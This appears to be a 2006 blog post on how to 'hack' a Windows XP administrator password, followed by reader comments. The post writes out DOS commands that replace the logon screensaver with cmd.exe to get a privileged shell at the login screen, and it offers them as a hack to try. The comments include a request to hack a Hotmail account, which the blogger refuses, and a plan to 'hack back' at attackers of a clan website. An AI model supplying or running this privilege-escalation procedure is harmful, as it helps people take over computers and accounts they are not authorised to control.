Quick How to Hack a Window XP Admins Password

4 12 2006

Internet Business Daily » Blog Archive How to Hack a Window XP Admins Password »

It goes a little something like this:

Log in and go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr
temphack\logon.scr
copy cmd.exe
temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

If you don’t know what you have just done, then don’t try it.  Only problem I see here is that alot of “work” PC’s have the system32 file set to “read only”.  Sort of the same problem witht the old “at” cmd hack.  Its a funny catch 22, you have to have Admin capabilities to use a hack to GET admin capabilities.

I have yet to see a hack that doesn’t involve rainbow tables and password cracking, which is definately doable, just not as elegant.


Actions

Information

7 responses

5 12 2006
Abdellatif Rochdi

This primitive way doesn’t work anymore, simply because windows prevent from changing the name of most files in it.

8 12 2006
bilal

how i can hack hotmail id??

8 12 2006
bilal

how i can hack hotmail e mailaddress?mail me on ma id

8 12 2006
therealdonquixote

@ bilal
Sorry d00d but I don’t hand out hacks like that. I post what I can here on this blog. Hacking email accounts is illegal and I don’t encourage that you try it.

If you have questions on any particular post please put them with that post.

Thanks.

6 01 2007
Muhammad Adeel MAlik

joke

19 01 2007
-=sAs=-Noisy

ok, i own a clan and my clan website keeps getting hacked, and i dont know how they keep doing it, im not very good on computers but they keep owning me, and i told every one i will hack them back, but i have no clue how to hack and i dont want every bodys exspectations of me being the supreme leader that can do every thing to go.
please help my clan site is sas-assassins.co.uk

15 06 2012
Ronaldinho

Usually I don’t read article on blogs, however I would like to say that this write-up very pressured me to try and do so! Your writing style has been surprised me. Thank you, very nice article.

Leave a Reply

